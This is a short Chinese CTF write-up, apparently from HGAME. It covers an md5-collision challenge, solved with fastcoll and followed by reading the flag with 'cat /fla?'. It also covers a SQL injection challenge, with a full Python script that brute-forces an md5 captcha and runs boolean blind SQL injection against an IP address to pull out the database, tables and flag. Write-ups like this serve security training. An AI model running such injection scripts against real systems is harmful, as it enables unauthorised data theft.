神奇的md5
扫到泄露拿到swp文件,恢复1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
session_start();
error_reporting(0);
if (@$_POST['username'] and @$_POST['password'] and @$_POST['code'])
{
$username = (string)$_POST['username'];
$password = (string)$_POST['password'];
$code = (string)$_POST['code'];
if (($username == $password ) or ($username == $code) or ($password == $code)) {
echo "Your input can't be the same";
}
else if ((md5($username) === md5($password)) and (md5($password) === md5($code))){
echo "Good";
header('Location: admin.php');
exit();
} else {
echo "<pre> Invalid password</pre>";
}
}
利用fastcoll进行md5强碰撞,通过了检验就是命令执行了cat /fla?
sqli-1
爆破md5然后布尔盲注1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37import requests
import hashlib
def md5(str):
sha = hashlib.md5(str)
e = sha.hexdigest()
return e
res = ''
url = 'http://118.89.111.179:3000/'
cookie = {
'PHPSESSID':'9jgb4e4s866rpfq3ivhg75r6fq'
}
for i in range(1000):
for j in range(33,128):
r = requests.get(url,cookies=cookie)
md5s = r.content[35:39]
# print (md5s)
code = 0
for x in range(10000000):
if md5(str(x))[0:4] == md5s:
code = x
break
url2 = 'http://118.89.111.179:3000/?code=%d&id=%s'
# hgame
# payload = "1 and (ascii(substr((select database()),%d,1))=%d)"%(i,j)
# f1l1l1l1g,words
# payload = "1 and (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%d,1))=%d)"%(i,j)
# f14444444g
# payload = "1 and (ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='f1l1l1l1g'),%d,1))=%d)"%(i,j)
payload = "1 and (ascii(substr((select f14444444g from f1l1l1l1g limit 0,1),%d,1))=%d)"%(i,j)
url2 = url2%(code,payload)
r = requests.get(url2,cookies=cookie)
if 'welcome' in r.content:
res += chr(j)
print res
break